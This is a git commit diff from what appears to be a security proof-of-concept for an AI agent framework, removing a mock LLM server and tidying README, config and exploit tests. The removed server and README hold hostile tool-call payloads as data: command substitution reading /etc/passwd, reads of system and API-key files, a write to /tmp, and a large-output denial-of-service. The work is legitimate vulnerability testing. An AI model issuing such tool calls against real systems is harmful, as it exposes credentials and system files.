Remove mock LLM server and related configurations; update README and exploit tests for clarity

This commit is contained in:
Dontrail Cotlage 2026-02-04 02:21:22 +00:00
parent c58cea33c5
commit 81f074a338
7 changed files with 17 additions and 233 deletions

View File

@ -1,12 +0,0 @@
# Mock LLM server for POC testing without real API calls
FROM python:3.11-slim
RUN pip install --no-cache-dir fastapi uvicorn
WORKDIR /app
COPY mock_llm_server.py ./
EXPOSE 8080
CMD ["uvicorn", "mock_llm_server:app", "--host", "0.0.0.0", "--port", "8080"]

View File

@ -97,16 +97,14 @@ poc/
├── docker-compose.yml # Container orchestration
├── Dockerfile.nanobot # Python app container
├── Dockerfile.bridge # Node.js bridge container
├── Dockerfile.mock-llm # Mock LLM server
├── mock_llm_server.py # Simulates LLM responses triggering tools
├── run_poc.sh # Test harness script
├── config/
│ └── config.json # Test configuration
│ └── config.json # Test configuration (not used by exploit scripts)
├── exploits/
│ ├── shell_injection.py # Shell bypass tests
│ ├── path_traversal.py # File access tests
│ └── litellm_rce.py # LiteLLM RCE vulnerability tests
├── sensitive/ # Test sensitive files
│ ├── shell_injection.py # Shell bypass tests - uses real ExecTool
│ ├── path_traversal.py # File access tests - uses real ReadFileTool/WriteFileTool
│ └── litellm_rce.py # LiteLLM RCE tests - scans real litellm source code
├── sensitive/ # Test files to demonstrate path traversal
└── results/ # Test output
```
@ -160,28 +158,6 @@ print(asyncio.run(tool.execute(command='cat /etc/passwd')))
"
```
## Mock LLM Server
The mock LLM server simulates OpenAI API responses that trigger vulnerable tool calls:
```bash
# Start the mock server
docker compose up mock-llm
# Set exploit mode
curl -X POST http://localhost:8080/set_exploit/path_traversal_read
# List available exploits
curl http://localhost:8080/exploits
```
Available exploit modes:
- `shell_injection` - Returns exec tool call with command injection
- `path_traversal_read` - Returns read_file for /etc/passwd
- `path_traversal_write` - Returns write_file to /tmp
- `sensitive_file_read` - Returns read_file for API keys
- `resource_exhaustion` - Returns command generating large output
## Expected Results
### Shell Injection

View File

@ -1,18 +1,18 @@
{
"provider": {
"model": "gpt-4",
"api_base": "http://mock-llm:8080/v1",
"api_key": "sk-poc-test-key-not-real"
"api_base": "https://api.openai.com/v1",
"api_key": "NOT_USED_IN_POC_TESTS"
},
"channels": {
"telegram": {
"enabled": false,
"token": "FAKE_TELEGRAM_TOKEN_FOR_POC",
"token": "NOT_USED_IN_POC_TESTS",
"allow_from": ["123456789"]
},
"whatsapp": {
"enabled": false,
"bridge_url": "ws://bridge:3000"
"bridge_url": "ws://localhost:3000"
}
},
"workspace": "/app/workspace",

View File

@ -44,19 +44,6 @@ services:
profiles:
- vulnerable # Only start with --profile vulnerable
# Mock LLM server for testing without real API calls
mock-llm:
build:
context: .
dockerfile: Dockerfile.mock-llm
container_name: mock-llm-poc
ports:
- "8080:8080"
volumes:
- ./mock-responses:/responses:ro
networks:
- poc-network
# Bridge service for WhatsApp vulnerability testing
bridge:
build:

View File

@ -130,12 +130,12 @@ class PathTraversalPOC:
)
self._print_result(r)
# Test 3: Read sensitive config
print("[TEST 3] Read /sensitive/api_keys.txt")
# Test 3: Read sensitive test file (demonstrates path traversal outside workspace)
print("[TEST 3] Read /sensitive/api_keys.txt (test file outside workspace)")
r = await self.test_read(
"api_keys",
"sensitive_test_file",
"/sensitive/api_keys.txt",
"API key disclosure"
"Sensitive file disclosure - if content contains 'PATH_TRAVERSAL_VULNERABILITY_CONFIRMED', vuln is proven"
)
self._print_result(r)

View File

@ -1,168 +0,0 @@
"""
Mock LLM server that returns predefined tool calls for security testing.
Simulates OpenAI-compatible API responses that trigger vulnerable code paths.
"""
import json
import uuid
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse
app = FastAPI(title="Mock LLM Server for Security POC")
# Predefined responses that trigger specific vulnerabilities
EXPLOIT_RESPONSES = {
"shell_injection": {
"model": "gpt-4",
"choices": [{
"message": {
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_shell_inject",
"type": "function",
"function": {
"name": "exec",
"arguments": json.dumps({
"command": "echo $(cat /etc/passwd)" # Command substitution bypass
})
}
}]
},
"finish_reason": "tool_calls"
}],
"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}
},
"path_traversal_read": {
"model": "gpt-4",
"choices": [{
"message": {
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_path_read",
"type": "function",
"function": {
"name": "read_file",
"arguments": json.dumps({
"path": "/etc/passwd"
})
}
}]
},
"finish_reason": "tool_calls"
}],
"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}
},
"path_traversal_write": {
"model": "gpt-4",
"choices": [{
"message": {
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_path_write",
"type": "function",
"function": {
"name": "write_file",
"arguments": json.dumps({
"path": "/tmp/poc_pwned.txt",
"content": "This file was created via path traversal vulnerability"
})
}
}]
},
"finish_reason": "tool_calls"
}],
"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}
},
"sensitive_file_read": {
"model": "gpt-4",
"choices": [{
"message": {
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_sensitive_read",
"type": "function",
"function": {
"name": "read_file",
"arguments": json.dumps({
"path": "/sensitive/api_keys.txt"
})
}
}]
},
"finish_reason": "tool_calls"
}],
"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}
},
"resource_exhaustion": {
"model": "gpt-4",
"choices": [{
"message": {
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_dos",
"type": "function",
"function": {
"name": "exec",
"arguments": json.dumps({
"command": "yes | head -c 100000000" # Generate 100MB output
})
}
}]
},
"finish_reason": "tool_calls"
}],
"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}
}
}
# Current exploit mode (can be changed via API)
current_exploit = "shell_injection"
@app.post("/v1/chat/completions")
async def chat_completions(request: Request):
"""Mock OpenAI chat completions endpoint."""
body = await request.json()
# Check if user message contains exploit trigger
messages = body.get("messages", [])
for msg in messages:
content = msg.get("content", "")
if isinstance(content, str):
for exploit_name in EXPLOIT_RESPONSES:
if exploit_name in content.lower():
response = EXPLOIT_RESPONSES[exploit_name].copy()
response["id"] = f"chatcmpl-{uuid.uuid4().hex[:8]}"
return JSONResponse(response)
# Default: return current exploit response
response = EXPLOIT_RESPONSES.get(current_exploit, EXPLOIT_RESPONSES["shell_injection"]).copy()
response["id"] = f"chatcmpl-{uuid.uuid4().hex[:8]}"
return JSONResponse(response)
@app.post("/set_exploit/{exploit_name}")
async def set_exploit(exploit_name: str):
"""Set the current exploit mode."""
global current_exploit
if exploit_name in EXPLOIT_RESPONSES:
current_exploit = exploit_name
return {"status": "ok", "exploit": exploit_name}
return {"status": "error", "message": f"Unknown exploit: {exploit_name}"}
@app.get("/exploits")
async def list_exploits():
"""List available exploit modes."""
return {"exploits": list(EXPLOIT_RESPONSES.keys())}
@app.get("/health")
async def health():
"""Health check endpoint."""
return {"status": "healthy", "current_exploit": current_exploit}

View File

@ -1,3 +1,4 @@
SECRET_API_KEY=sk-supersecret12345
DATABASE_PASSWORD=admin123
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
# TEST DATA - Demonstrates path traversal can read sensitive files
# If this content appears in POC output, the vulnerability is confirmed
SENSITIVE_DATA_MARKER=PATH_TRAVERSAL_VULNERABILITY_CONFIRMED
TEST_SECRET=this_file_should_not_be_readable_from_workspace